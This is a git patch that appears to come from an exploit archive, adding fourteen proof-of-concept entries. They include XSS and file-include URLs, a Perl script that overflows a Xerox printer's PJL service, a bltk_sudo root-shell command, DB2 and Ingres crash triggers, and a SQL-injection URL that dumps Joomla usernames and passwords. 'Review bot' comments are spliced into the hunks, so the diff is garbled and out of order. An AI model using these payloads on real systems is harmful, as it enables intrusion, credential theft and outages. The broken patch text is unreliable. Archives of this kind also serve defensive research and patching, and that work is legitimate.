From 65f378afeb44ac6cb901a5759798aae5238ef8e3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 31 May 2014 04:36:31 +0000
Subject: [PATCH] Updated 05_31_2014

---
 files.csv | 14 +++++++++
 platforms/cfm/webapps/33575.txt | 7 +++++
 platforms/hardware/dos/33583.pl | 30 +++++++++++++++++++
 platforms/hardware/remote/33580.txt | 7 +++++
 platforms/linux/dos/33581.txt | 11 +++++++
 platforms/linux/local/33576.txt | 11 +++++++
 platforms/multiple/dos/33579.txt | 12 ++++++++
 platforms/multiple/dos/33584.txt | 10 +++++++
 platforms/multiple/remote/33577.txt | 9 ++++++
 platforms/multiple/remote/33578.txt | 9 ++++++
 platforms/multiple/webapps/33493.txt | 44 ++++++++++++++++++++++++++++
 platforms/php/webapps/33514.txt | 16 ++++++++++
 platforms/php/webapps/33574.txt | 9 ++++++
 platforms/php/webapps/33582.txt | 7 +++++
 platforms/unix/local/33572.txt | 14 +++++++++
 15 files changed, 210 insertions(+)
 create mode 100755 platforms/cfm/webapps/33575.txt
 create mode 100755 platforms/hardware/dos/33583.pl
 create mode 100755 platforms/hardware/remote/33580.txt
 create mode 100755 platforms/linux/dos/33581.txt
 create mode 100755 platforms/linux/local/33576.txt
 create mode 100755 platforms/multiple/dos/33579.txt
 create mode 100755 platforms/multiple/dos/33584.txt
 create mode 100755 platforms/multiple/remote/33577.txt
 create mode 100755 platforms/multiple/remote/33578.txt
 create mode 100755 platforms/multiple/webapps/33493.txt
 create mode 100755 platforms/php/webapps/33514.txt
 create mode 100755 platforms/php/webapps/33574.txt
 create mode 100755 platforms/php/webapps/33582.txt
 create mode 100755 platforms/unix/local/33572.txt

diff --git a/files.csv b/files.csv
index 444ed27a6..48a672db2 100755
--- a/files.csv
+++ b/files.csv
@@ -30174,6 +30174,7 @@ id,file,description,date,author,platform,type,port
 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
 33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
+33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDMS web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0
 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0
 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
@@ -30191,6 +30192,7 @@ id,file,description,date,author,platform,type,port
 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
+33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
@@ -30240,3 +30242,15 @@ id,file,description,date,author,platform,type,port
 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 'servercert' Parameter Cross Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0
 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0
 33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability",2010-01-27,Intevydis,linux,dos,0
+33572,platforms/unix/local/33572.txt,"IBM DB2 'REPEAT()' Heap Buffer Overflow Vulnerability",2010-01-27,"Evgeny Legerov",unix,local,0
+33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 'tid' Parameter Cross Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0
+33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0
+33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0
+33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x Multiple Cross Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0
+33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0
+33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow Vulnerability",2010-01-29,"Evgeny Legerov",multiple,dos,0
+33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross Site Scripting Vulnerability",2010-01-29,Yoyahack,hardware,remote,0
+33581,platforms/linux/dos/33581.txt,"Hybserv2 ':help' Command Denial Of Service Vulnerability",2010-01-29,"Julien Cristau",linux,dos,0
+33582,platforms/php/webapps/33582.txt,"Joomla! 
'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0
+33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0
+33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0
diff --git a/platforms/cfm/webapps/33575.txt b/platforms/cfm/webapps/33575.txt
new file mode 100755
index 000000000..3a9eb7b67
--- /dev/null
+++ b/platforms/cfm/webapps/33575.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37986/info
+
+CommonSpot Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+https://www.example.com/commonspot/utilities/longproc.cfm?onlyurlvars=1&url=%27;--%3E%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E
diff --git a/platforms/hardware/dos/33583.pl b/platforms/hardware/dos/33583.pl
new file mode 100755
index 000000000..a569bab59
--- /dev/null
+++ b/platforms/hardware/dos/33583.pl
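Review bot: The advisory attributes the CommonSpot flaw to missing input sanitization but never says where the `url` value lands, and the payload itself (`';--></script><script>alert(1)</script>` once decoded) only works if the value is reflected inside an existing inline `<script>` block as a JavaScript string literal. That context matters for anyone fixing or verifying it: HTML-entity encoding alone would not stop the `</script>` break-out, so the value needs JavaScript-string escaping plus `</` escaping. Suggested line after the URL: `Note: the payload closes a JS string and the enclosing script element, so url appears to be reflected unescaped into inline script (inferred from the payload; confirm against longproc.cfm).`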
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/38010/info
+
+Xerox WorkCentre is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application.
+
+Xerox WorkCentre 4150 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl -w
+
+
+use IO::Socket;
+if (@ARGV < 1){
+exit
+}
+$ip = $ARGV[0];
+#open the socket
+my $sock = new IO::Socket::INET (
+PeerAddr => $ip,
+PeerPort => '9100',
+Proto => 'tcp',
+);
+
+
+$sock or die "no socket :$!";
+send($sock, "\033%-12345X\@PJL ENTER LANGUAGE = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);
+
+
+
+close $sock;
\ No newline at end of file
diff --git a/platforms/hardware/remote/33580.txt b/platforms/hardware/remote/33580.txt
new file mode 100755
index 000000000..7b5f157bc
--- /dev/null
+++ b/platforms/hardware/remote/33580.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38004/info
+
+Comtrend CT-507 IT is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1
\ No newline at end of file
diff --git a/platforms/linux/dos/33581.txt b/platforms/linux/dos/33581.txt
new file mode 100755
index 000000000..c061da034
--- /dev/null
+++ b/platforms/linux/dos/33581.txt
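Review bot: `if (@ARGV < 1){ exit }` exits silently with status 0 when the printer address is omitted, and the `send()` return value is ignored, so a typo in the host or a closed port 9100 produces no output at all; prefer `die "usage: $0 <printer-ip>\n" unless @ARGV;` and `send(...) or die "send failed: $!";`. The `IO::Socket::INET` constructor also passes no `Timeout => 5,`, so a filtered port leaves the script hanging on connect. A header comment saying this is a crash trigger (a single oversized `@PJL ENTER LANGUAGE` value on port 9100) rather than a code-execution exploit would match the `dos` classification the commit gives it.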
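Review bot: The PoC `scvrtsrv.cmd?action=add&srvName=XSS_HERE&...` does not say whether the script runs on the immediate response or later when the saved virtual-server entry is displayed, nor whether the request needs an authenticated session on the router's web interface, and both decide how exploitable this is. Because `action=add` changes device configuration over a plain GET, the same URL also looks like a CSRF vector, which is worth a sentence since it turns the attack into one link an administrator has to click. Suggested line: `Note: srvName appears to be saved with the new virtual-server entry and rendered later (stored XSS) — confirm; state whether an admin session is required and whether the GET is CSRF-able.`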
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38006/info
+
+Hybserv2 is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to deny service to legitimate users.
+
+Hybserv2 1.9.4 is vulnerable; other versions may also be affected.
+
+The following example command is available:
+
+PRIVMSG memoserv :help \t
\ No newline at end of file
diff --git a/platforms/linux/local/33576.txt b/platforms/linux/local/33576.txt
new file mode 100755
index 000000000..48007190e
--- /dev/null
+++ b/platforms/linux/local/33576.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37996/info
+
+Battery Life Toolkit (BLTK) is prone to a local privilege-escalation vulnerability.
+
+A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in the complete compromise of the affected computer.
+
+This issue affects BLTK 1.0.9; other versions may be vulnerable as well.
+
+The following proof of concept is available:
+
+/usr/lib/bltk/bin/bltk_sudo /bin/bash
\ No newline at end of file
diff --git a/platforms/multiple/dos/33579.txt b/platforms/multiple/dos/33579.txt
new file mode 100755
index 000000000..16975844b
--- /dev/null
+++ b/platforms/multiple/dos/33579.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/38001/info
+
+Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application.
+
+Ingres Database 9.3 on Unix is vulnerable; other versions may also be affected.
+
+s = "\x00\x00\x00\x00"
+s += "\xff\xff\xff\xff"
+s += "\x3c\x00\x00\x00\x06\x00\x00\x00"
+s += "A" * 1000
\ No newline at end of file
diff --git a/platforms/multiple/dos/33584.txt b/platforms/multiple/dos/33584.txt
new file mode 100755
index 000000000..bfe5fc567
--- /dev/null
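Review bot: The trigger `PRIVMSG memoserv :help \t` is ambiguous as written: `\t` may mean one TAB byte (0x09) after `help` or the two literal characters backslash and t, and those are different messages on the wire. Since the whole PoC is this one line, spell it out, e.g. `PRIVMSG memoserv :help <TAB>` plus a note `the trailing character is a literal tab (0x09) sent as part of the command parameter`. It would also help to say whether any connected client can send this or only a registered/opered one, which bounds who can take the services down.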
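Review bot: `/usr/lib/bltk/bin/bltk_sudo /bin/bash` is presented with no precondition, so a reader cannot tell why an unprivileged user ends up with a root shell — whether the binary is installed setuid root or the package ships a sudoers rule that lets anyone run it — or what to check when auditing a host. Suggested addition: `Precondition: bltk_sudo runs with root privileges for ordinary users (check with ls -l /usr/lib/bltk/bin/bltk_sudo and sudo -l); it passes its argument to a privileged shell without restricting the command — inferred from the PoC, confirm against the 1.0.9 source.` A one-line fix hint (remove the wrapper or restrict it to the benchmark commands it exists for) would complete the entry.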
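Review bot: The snippet builds `s` but never says how it is delivered — no port, no protocol, and nothing about whether a handshake precedes it — so the hunk cannot be reproduced from the file alone. The header chunk `\x3c\x00\x00\x00\x06\x00\x00\x00` looks like a little-endian length (0x3c = 60) and a type (6) that do not match the 1000-byte body, which may be the trigger, but that is a guess the text should confirm or correct. Suggested lines above the snippet: `Send s as one TCP message to the vulnerable Ingres listener on port <n> immediately after connect; the 8-byte header is presumed to be length (0x3c) and message type (6) — confirm against the protocol.`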
+++ b/platforms/multiple/dos/33584.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38018/info
+
+IBM DB2 is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
+
+IBM DB2 9.7 is vulnerable; other versions may also be affected.
+
+The following sequence of bytes can trigger this vulnerability:
+"\x00\x05\x03\x31\x41"
\ No newline at end of file
diff --git a/platforms/multiple/remote/33577.txt b/platforms/multiple/remote/33577.txt
new file mode 100755
index 000000000..49355ffaf
--- /dev/null
+++ b/platforms/multiple/remote/33577.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37997/info
+
+XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect XAMPP 1.6.8 and prior; other versions may be affected as well.
+
+http://www.example.com/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/33578.txt b/platforms/multiple/remote/33578.txt
new file mode 100755
index 000000000..1cab98452
--- /dev/null
+++ b/platforms/multiple/remote/33578.txt
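Review bot: The five-byte trigger `"\x00\x05\x03\x31\x41"` is given without the listener it targets: the files.csv entry names `kuddb2`, but the text omits the TCP port, whether the bytes are sent immediately after connect, and whether any authentication precedes them, so a defender cannot write a network signature or confirm exposure. Suggested line: `Sent as the first bytes of a new TCP connection to the kuddb2 listener on port <n>; the leading 0x0005 is presumed to be a length field — confirm.` Saying which DB2 9.7 process `kuddb2` is would also help, since the title only says IBM DB2.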
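Review bot: The title and text promise multiple cross-site scripting vulnerabilities in XAMPP 1.6.8 and prior, yet the hunk supplies a single vector, `showcode.php?TEXT[global-showcode]=<script>…`; list the other parameters or pages, or change the wording to one issue. The vector is notable because the injection goes through an array index (`TEXT[…]`), which suggests request data is merged into the page's text/label table rather than a single field — if confirmed, that explains why there would be many sinks and deserves a sentence. The `/xampp/` path suggests these are the bundled demo/status pages, so the practical mitigation — delete or access-restrict that directory on any reachable host — belongs in the entry.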
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37999/info
+
+XAMPP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+This issue affects XAMPP 1.6.8 and prior; other versions may be vulnerable as well.
+
+http://www.example.com/xampp/showcode.php?showcode=1&file=../index.php
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33493.txt b/platforms/multiple/webapps/33493.txt
new file mode 100755
index 000000000..c0ad831c6
--- /dev/null
+++ b/platforms/multiple/webapps/33493.txt
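Review bot: The text claims the include flaw lets an attacker "execute arbitrary local scripts", but the only PoC, `showcode.php?showcode=1&file=../index.php`, traverses one level to a file inside the web root and demonstrates source disclosure, nothing more. Either show a request that reaches outside the document root or reduce the stated impact to information disclosure; a page named `showcode` may print the file rather than include it, which this hunk does not settle. As with the sibling XAMPP entry, the mitigation is to remove or access-restrict the bundled `/xampp/` pages on any reachable host.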
@@ -0,0 +1,44 @@
+# Exploit Title: Multiple Stored XSS
+# Software: Maya EDMS
+# Software Link: http://www.mayan-edms.com/downloads/Mayan%20EDMS%20v0.13.ova
+# Version: 0.13 - latest
+# Author: Dolev Farhi, email: dolev(at)openflare(dot)org @f1nhack
+# Date: 21.5.2014
+# Tested on: Kali Linux
+# Vendor homepage: www.mayan-edms.com
+
+
+
+1. About the application:
+=========================
+Mayan (or Mayan EDMS) is a web-based free/libre document management system for managing documents within an organization
+
+
+2. Vulnerability Description:
+===============================
+An attacker is able to create documents and tags with malicious code, potentially stealing admin cookies browsing or editing the documents.
+
+
+3. Steps to reproduce:
+========================
+* Stored XSS 1:
+Tags -> Create new tag -> -> Save
+
+any navigation to documents or search will execute the XSS
+
+* Stored XSS 2:
+Setup -> Sources -> Staging folders -> Add new source -> Title it:
+Submit -> navigate to edit it again -> XSS executes
+
+* Stored XSS 3:
+Setup -> Bootstrap -> Create new bootstrap setup -> Name -> submit -> XSS
+
+* Stored XSS 4:
+Setup -> Smart links -> Create new smart link -> Title it -> submit -> edit -> XSS executes
+
+
+5. Proof of concept video
+http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/33514.txt b/platforms/php/webapps/33514.txt
new file mode 100755
index 000000000..591728673
--- /dev/null
+++ b/platforms/php/webapps/33514.txt
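Review bot: As rendered in this hunk the reproduction steps carry no payload — `Tags -> Create new tag -> -> Save` and `Add new source -> Title it:` leave an empty slot where the injected string should be — so the file never says what was entered into which field or what the script did; if markup was stripped on submission, write the payload in a form that survives (URL- or entity-encoded, or quoted). The header calls the product `Maya EDMS` while the title and body say `Mayan EDMS`, the sections jump from 3 to 5, and the only evidence is an `.avi` on a third-party host that will not stay online. Suggested line under each step: `Payload used: (the exact string entered); rendered without output encoding on (page/field).`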
@@ -0,0 +1,16 @@
+# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
+# Google Dork: inurl:"single.php?url=" video
+# Date: 05.05.2014
+# Exploit Author: Mustafa ALTINKAYNAK
+# Vendor Homepage: http://www.phpscriptlerim.com
+# Software Link: http://demo.phpscriptlerim.com/free/videostube/
+# Version: 1.0
+
+Description (Aç?klama)
+========================
+Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.
+
+Vulnerability
+========================
+1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
+2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)
\ No newline at end of file
diff --git a/platforms/php/webapps/33574.txt b/platforms/php/webapps/33574.txt
new file mode 100755
index 000000000..8045d6908
--- /dev/null
+++ b/platforms/php/webapps/33574.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37982/info
+
+Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Discuz! 6.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/bbs/viewthread.php?tid=">>
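Review bot: The `# Exploit Title` line claims "SQL Injection and Remote Code Execution", but the body only demonstrates boolean-based blind SQL injection in the `url` parameter of `videocat.php` and `single.php`; no path to code execution is shown, and the files.csv entry added in this same commit already titles it "Multiple SQL Injection Vulnerabilities", so the two disagree. Drop "and Remote Code Execution" or add the step that achieves it. Saying which DBMS was confirmed and that the injection lands in a single-quoted string context (the `'ODau'='ODau` tail shows that) would also help a defender write the fix, which is a parameterized query for `url`.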

XSS By Fatal Error

\ No newline at end of file
diff --git a/platforms/php/webapps/33582.txt b/platforms/php/webapps/33582.txt
new file mode 100755
index 000000000..35faad773
--- /dev/null
+++ b/platforms/php/webapps/33582.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38009/info
+
+The 'com_rsgallery2' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_rsgallery2&page=inline&id=5&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users--
\ No newline at end of file
diff --git a/platforms/unix/local/33572.txt b/platforms/unix/local/33572.txt
new file mode 100755
index 000000000..6b1e345d5
--- /dev/null
+++ b/platforms/unix/local/33572.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/37976/info
+
+IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.
+
+The issue affects the following:
+
+IBM DB2 versions prior to 9.1 Fix Pack 9
+IBM DB2 9.7
+
+Other versions may also be affected.
+
+SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1
\ No newline at end of file
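Review bot: The PoC `http://www.example.com/bbs/viewthread.php?tid=">>` is cut off as it appears in the hunk, with `XSS By Fatal Error` stranded on its own line, which reads like markup stripped out of the `tid` value and leaves the entry with no usable reproduction step. Write the payload URL-encoded (`tid=%22%3E%3Cscript%3E...%3C/script%3E`) so it survives rendering and matches what is actually sent, and state where `tid` is reflected — the leading `">` implies an attribute break-out, but that is inferred, not stated. The text also has a minor typo, `an cross-site scripting`.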
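Review bot: The PoC `catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users--` silently relies on two site-specific assumptions: the default `jos_` table prefix and a 13-column select in the vulnerable query. On an install with a custom prefix or a different rsgallery2 build the same request fails without proving the site is safe, so state both, along with the fact that `catid` is injected as a bare integer (no quote break needed; `-1` empties the legitimate result set). Also say whether `page=inline` is reachable without authentication, since that decides severity.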
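Review bot: The trigger `SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1` hinges on the count 1073741825 = 2^30 + 1, and the text never explains it; a reader should be told that the inner call yields a 1000-byte string and the outer count is chosen so the computed result length exceeds 32 bits before the buffer is sized (presumed from the values — confirm), otherwise the number looks arbitrary. Since files.csv files this under `local`, the prerequisite belongs in the text too: an authenticated DB2 session, with whichever authority is needed to run the query stated explicitly. Suggested line above the query: `-- count is 2^30+1: 1000 * (2^30+1) exceeds 32 bits, presumably wrapping the result-length computation.`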